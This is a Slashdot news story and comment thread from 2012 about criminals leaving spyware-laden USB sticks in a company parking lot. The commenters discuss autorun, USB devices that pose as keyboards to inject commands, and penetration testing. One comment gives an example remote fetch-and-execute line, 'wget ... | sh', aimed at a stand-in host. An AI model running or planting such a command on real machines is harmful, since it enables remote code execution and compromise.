Forgot your password?
typodupeerror
Security

Criminals Distribute Infected USB Sticks In Parking Lot 298

Posted by Unknown Lamer
from the our-dear-friend-social-engineering dept.
New submitter sabri writes "The Dutch news-site Elsevier is reporting that cybercriminals attempted to steal data from a multinational chemicals company by 'losing' spyware-infected USB sticks on the company's parking lot. Their attempt failed as one of the employees who found the stick dropped it off at the company's IT department, who then found the spyware and issued a warning. So next time, don't expect to find someone's dirty pictures on a USB stick you just found..."
This discussion has been archived. No new comments can be posted.

Criminals Distribute Infected USB Sticks In Parking Lot

Comments Filter:
  • by Kenja (541830) on Monday July 09, 2012 @08:33PM (#40598133)
    So you can load USB sticks you find and extract the pictures!
    • by Anonymous Coward on Monday July 09, 2012 @08:37PM (#40598153)

      No, that's what operating systems that don't automatically run any executable that happens to appear are for.

      Good god - how idiotic does an OS have to be, to run executables from any media you happen to insert?

      • by Anaerin (905998) on Monday July 09, 2012 @09:16PM (#40598397)
        Just because it looks like a memory stick, doesn't mean it actually is one. Put a microcontroller in there with a USBHID type program and you've got a keylogger, or some other remote access system just waiting to be triggered.
        • Even better is if it is a Firewire device -- from what I've read, Firewire gives all kinds of direct memory access to stuff plugged into it (it is a system level bus). Even more so for PC-card (pcmcia) devices.

        • by Anonymous Coward on Monday July 09, 2012 @11:13PM (#40598993)

          We had a couple turn out in our parking lot that when plugged in showed up as a hub that was connected to a usb drive, cd drive and a keyboard. The last one was tricky. After being plugged in, it would install the devices one by one and try to run them, if that didn't work, it registered as a keyboard and tried to put the input of windows key+r then iexplore websiteURL. That last one took me by surpise, as I'd never seen it before.

        • Can a keylogger work if it's mounted read only? How would it get the data?
          • by Anaerin (905998)
            How, precisely, do you mount a keyboard as read-only? Because that's what the micro-controller I'm proposing will look like to the system. It'd appear as a memory stick and a keyboard or a mouse or some other kind of interface device.
          • by sqlrob (173498)

            He's not saying the software on the stick is a keylogger. He's saying the stick itself is a keylogger. Just because it looks like a flash drive doesn't mean it is one.

      • by JDG1980 (2438906) on Monday July 09, 2012 @11:45PM (#40599121)

        Good god - how idiotic does an OS have to be, to run executables from any media you happen to insert?

        Not idiotic, just outdated. When Windows XP was released, way back in 2001, the assumption was that removable media was going to be a pressed CD or DVD and that these sources could be trusted. This assumption started to break down with the advent of cheap CD/DVD writers, and became completely absurd when inexpensive flash drives proliferated.

        As a result, Microsoft removed Autorun from USB drives [computerworld.com] as part of a Windows XP update in 2011. (Probably a bit late, but still, they did fix it.) On Windows 7, Autorun for USB drives was never included. The user would have to run the malware manually (and if it wants admin permissions, you'd also have to click through the UAC warning).

        • by Barbarian (9467)

          Good god - how idiotic does an OS have to be, to run executables from any media you happen to insert?

          Not idiotic, just outdated. When Windows XP was released, way back in 2001, the assumption was that removable media was going to be a pressed CD or DVD and that these sources could be trusted. This assumption started to break down with the advent of cheap CD/DVD writers, and became completely absurd when inexpensive flash drives proliferated.

          Autorun comes from Windows 95. Worth noting that cd writers were pretty cheap in 1998.

      • I think an executable would be fine. I think executables would be what lets Linux take off in the market more.

        The key is: Do not let an executable change data in any directory other than where it is installed. This way it can't change the system boot sector! It can't even change your sims baby cats edition.

        You could turn Windows into a solid security machine if you just did that. People would start downloading junk they find off the internet and liking it.
    • by gman003 (1693318)

      Why bother with virtuals?

      I have a "shitbox" I would use for this. The intent is that it is disposable - both hardware and data. In my case, it's an old, beige Athlon 900 desktop with a fading Windows ME sticker still on it. I've slapped all my old hard drives and OpenBSD on it.

      I use it mainly for trying out server shit. Learned how to set up Samba and Apache on it. Tried out several other things, as well.

      The only data on it are some SNES ROMs, tertiary backups of non-secret data (source code for various per

  • by the_humeister (922869) on Monday July 09, 2012 @08:36PM (#40598147)

    Or turn off auto-run in Windows. I once found a USB drive on the ground. Turns out it was some grad student's drive. I tried to return it but got no response from the email I found on his resume.

  • by awollabe (464677) on Monday July 09, 2012 @08:40PM (#40598181)

    and laugh at the windows auto-loader files they tried to get you with.

    Seriously, I found a "trick" USB stick in my work mailbox once, which turned out to be a test from our IT department that, if you loaded it (in Windows), would direct you to an obligatory computer security training program. After I called them about it, they let me keep it.

    • by mlts (1038732) * on Monday July 09, 2012 @09:15PM (#40598391)

      USB sticks can present themselves to the computer as more than just removable hard disks. I've seen some that will act as keyboards and when plugged into Windows, will automatically try to type things in.

      If the USB device can present itself as the right item, it can potentially do more damage than "just" a drive or filesystem with malware on it.

      • by bill_mcgonigle (4333) * on Monday July 09, 2012 @09:52PM (#40598603) Homepage Journal

        If the USB device can present itself as the right item, it can potentially do more damage than "just" a drive or filesystem with malware on it.

        I forget the exact mode of attack, but some will nudge the mouse a pixel or two every minute or so to prevent the screensaver from kicking on, and then after some period of user inactivity will begin doing the nefarious bits. I suppose it's easy to kick off a cmd shell from that point and script the attack.

        I'd imagine the non-mouse/keyboard part of the "drive" is baited with good porn or addictive games to encourage its continued presence. Anyway, you can scan it all you want, the drive is clean.

  • by toygeek (473120) on Monday July 09, 2012 @08:41PM (#40598199) Homepage Journal

    dd if=/dev/zero of=/dev/[usbdrive]

    voila, free thumb drive, malware free.

    • by mug funky (910186)

      that will likely bugger the drive up completely. some flash drives get written past the end or some crap like that.

      long story short, i tried this on a thumb drive that reported 8 gigs and was actually 4 gigs... after running dd it was completely useless and unrecoverable, at least by someone of my level of proficiency. YMMV

      • by mark-t (151149) <markt@lynx . b c.ca> on Monday July 09, 2012 @09:07PM (#40598349) Journal
        After executing 'dd', you still need to run mkfs on the device that holds the filesystem, or else all you have is a blanked drive. Don't forget to use "-t vfat" as an option to mkfs, or else you won't be able to use it anywhere but in Linux.
    • Heh heh... For Linux I do this routinely to get rid of the manufacturer's crapware, but every time I mount it on my GF's WinXP box it actually has to pause so it can download and reinstall it. WTF?

      • by v1 (525388)

        the really annoying ones are the drives that present TWO storage devices. One usually contains drivers, or a small partition with the security software to properly mount the second protected device.

        Those are usually NOT separate partitions, they're separate DEVICES and thus a dump from DD doesn't get them both. The other one is usually permanently write-protected also, tho there can be ways to get around that sometimes if you know how.

    • by hawguy (1600213) on Monday July 09, 2012 @08:51PM (#40598269)

      dd if=/dev/zero of=/dev/[usbdrive]

      voila, free thumb drive, malware free.

      Not if the drive has firmware that detects if it's plugged into a Windows host. For non-windows, it acts as a normal flash drive, but if you plug it into Windows, then it exposes the virus. So you take it home, load it up with MP3's from your linux computer and everything is fine, but then when you give it to your wife and she see a filenamed "naked_secretary.exe", she runs it and gets infected.

      • by k(wi)r(kipedia) (2648849) on Monday July 09, 2012 @09:09PM (#40598363)

        Not if the drive has firmware that detects if it's plugged into a Windows host.

        Interesting. But can Linux detect the presence of the firmware, which presumably has to send some sort of message down the USB bus? My closest experience to this is with a combo USB 3G modem and flash drive.

        To handle such devices under Linux, there's a program called USB modeswitch. From the package description:

        Mode switching tool for controlling "flip flop" USB devices

        Several new USB devices have their proprietary Windows drivers onboard, especially WAN dongles. When plugged in for the first time, they act like a flash storage and start installing the driver from there. If the driver is already installed, the storage device vanishes and a new device, such as an USB modem, shows up. This is called the "ZeroCD" feature.

        On Debian, this is not needed, since the driver is included as a Linux kernel module, such as "usbserial". However, the device still shows up as "usb-storage" by default. usb-modeswitch solves that issue by sending the command which actually performs the switching of the device from "usb-storage" to "usbserial".

    • by fermion (181285) on Monday July 09, 2012 @10:47PM (#40598847) Homepage Journal
      As long as your computer does not autoexecute the USB drive, there is no problem. Of course, on many machines the USB does execute automatically, and it seems if the IT department lets that behavior stand, the responsibility cannot be with the user, but with the IT people.
    • by Chuck Chunder (21021) on Monday July 09, 2012 @11:33PM (#40599075) Homepage Journal
      The trouble with USB is that you don't know. Let's say you plug in that "thumb drive". Perhaps it turns out to be a "keyboard" that issues whatever the shortcut is for executing a command and sends something like:

      wget -q -O - http://naughty.com/ [naughty.com] | sh

      All sorts of things could happen when you plug in a USB stick. Perhaps not too much of a worry in practice for Joe Schmo as doing it effectively would probably require a level of sophistication that would make it not worth while for a vague target but Linux does not magically make USB sticks safe.
  • by Darth_brooks (180756) <clipper377.gmail@com> on Monday July 09, 2012 @08:55PM (#40598301) Homepage

    This technique is discussed in "Metasploit - The penetration testers guide" ( http://shop.oreilly.com/product/9781593272883.do [oreilly.com] )

    Excellent book by the way. After reading it, you'll never look at computer security the same way again, and may very well just switch to an Abacus with a box of crayons on top.

  • How many times did this work and we DONT hear about it, in cases where people did NOT take it to their IT department?

    • by bloodhawk (813939)
      probably thousands of times, this is a very very old form of attack that has been commonly documented and used dating all the way back to the floppy disk. Most IT departments have policies specifically around found disks and media for this exact reason. Why one such failed attempts warrants a front page article is the real mystery here.
  • So next time, don't expect to find someone's dirty pictures on a USB stick you just found...

    Actually, that's exactly what industrial spies should put on there if they were smart.

  • Old trick. (Score:5, Insightful)

    by Caerdwyn (829058) on Monday July 09, 2012 @09:27PM (#40598461) Journal

    This is a time-honored way of targeting a particular company. It sounds expensive, but if your motivation is commercial or governmental *coughcoughstux* it's extremely cheap compared to the alternatives (bribery, breaking-and-entering, rubber-hose cryptography). It's also a great way of finding out whether your own organization is aware of malware trouble; this technique is commonly used as part of security audits performed by companies hired to find out how good your company really is.

    A company I worked for a few years ago hired a security auditing firm to check up on ourselves (only a few people were told, and we were told to keep quiet to ensure that our day-to-day practices were tested, not our "crap, someone's checking!" performance). They were unable to penetrate the network from the outside (including wirelessly) or socially engineer their way past reception or weasel out a password, but they got in via the USB-stick-in-the-parking-lot method. They told us afterwards that this is an extremely effective technique, as primate curiosity is almost unstoppable.

    • by Zadaz (950521)

      Older than that. Well before USB thumb drives I was contracting at [Large Government Contractor You've Heard Of]. One day someone was outside on the street giving away CDs with free software on them. They were nice and pro, color cardboard sleeves shrink-wrapped. On the CDs were a bunch of shareware and just as many viruses.

      I didn't really mind. for three full days I got paid to sit around and wait for the admins to fumigate the network.

      The exact same thing happened less than a year later.

  • Idiots. Both of them.

  • Personal Story (Score:5, Interesting)

    by schklerg (1130369) on Monday July 09, 2012 @09:46PM (#40598579)
    So a coworker found a usb key in the parking lot and wisely didn't plug it in. Instead he asked me to check it out before he did. So dutifully I fired up my live CD, plugged it in and quickly saw it belonged to a coworker. But which one in a company of 300+? Well, that was actually pretty easy to figure out, since there was a nice folder with pictures of himself naked in a mirror. Many of them. All alone. So I gave the guy the USB key, told him what I'd seen, washed my hands (and disinfected my cubicle) and was sooooo glad when the photographer took a different job.
    So there may be a virus, or maybe just a lonely coworker.
  • Contest (Score:5, Interesting)

    by chrismcb (983081) on Monday July 09, 2012 @10:06PM (#40598677) Homepage
    Wouldn't it be more productive to give them away? As in brand them with the name of a product, and literally give them away at a place where they employees visit. I think someone would be much more likely to use a USB given to them at a "legitimate" event, than one found on the ground.
    • by Jeremi (14640)

      Wouldn't it be more productive to give them away? [...] I think someone would be much more likely to use a USB given to them at a "legitimate" event, than one found on the ground.

      I think you're right... but the downside would be that it would be much easier for the victims to track the infection back to its source that way.

  • Any security-minded organization would indoctrinate their employees, and set policy (either via OS security and/or SOP) to use only secured USB keys, which are provided. This should be a no-brainer, and shouldn't cost a significant amount.

    This kind of policy limit the scope of these kind of attacks, as well as helps to prevent inadvertent info-leaks like when workers lose their wallet/backpack. By preventing stupidity and bad luck you greatly improve the company security.

  • Social Engineering at its finest and most simplest. Much more effective getting your payload unto a system using this method then say then using a dancing baby gif.

  • by humanrev (2606607) on Monday July 09, 2012 @11:44PM (#40599117)

    The autorun feature of Windows (mainly XP and to a much lesser extend Vista/7) is a textbook example of where trading convenience for security can turn out to be a VERY BAD IDEA.

    Autorun functionality pisses me off anyway. I always turn that shit off mainly because yes, if I put in a DVD or a USB flash it's likely I'm going to be wanting to use it soon, but since Autorun is going to invariable pop up some Explorer window or DVD application all of a sudden once the media has been analysed, that very action of a new window popping up without my direct instantiation of it is damn annoying.

    Saving the couple of clicks to perform the same effect of whatever Autorun does is really, really not worth the mess we've gotten ourselves into (and still do).

    • by humanrev (2606607)

      Fuck, that should have read "trading security for convenience". As in, you give up security in exchange for obtaining convenience.

      Oh now my whole comment is ruined. I can't bear to read the responses from strangers I'll never meet in the flesh, it will be too much to bear!

  • I found a RAM stick once in a parking lot, I plugged it in and found nothing, or so I thought, a directory listing was empty and a anti-virus scan returned a clean bill of health. A few days later my friend told me that he was receiving emails from me. After investigation it was determined that a Linux on windows was running, with a SMTP server and a mail client was sending many emails. Is that possible? I asked about the reason for the SMTP server, I was told it was in case my ISP was blocking or throttlin
  • by Tom (822) on Tuesday July 10, 2012 @03:28AM (#40599949) Homepage Journal

    This is so old and has happened so many times before that some organisations have had time to develop, test and deploy so-called "data gateways" - machines that you can put your USB sticks, DVDs and other media into, that will scan them for infection and safely transfer the files you select to your network share.

  • by ewanm89 (1052822) on Tuesday July 10, 2012 @08:30AM (#40601003) Homepage

    1) Penetration testers have been using this attack for some time, surprisingly often it works, it only takes one clueless manager to plug it in.

    2) With a little creative reengineering one does not need to rely on the system to automount and autorun the stick, instead one sticks a USB hub in there and a HID emulator and pumps out keystrokes, pretty much all operating systems will automatically initialize it as a keyboard device. Also one can hide that function until go time. let them act as ordinary memory sticks 'till then.

  • by Rambo Tribble (1273454) on Tuesday July 10, 2012 @09:57AM (#40601547)

    1. Don't, under any circumstances, mount it

    2. Format it

    3. Enjoy your new USB stick

Every young man should have a hobby: learning how to handle money is the best one. -- Jack Hurley

Working...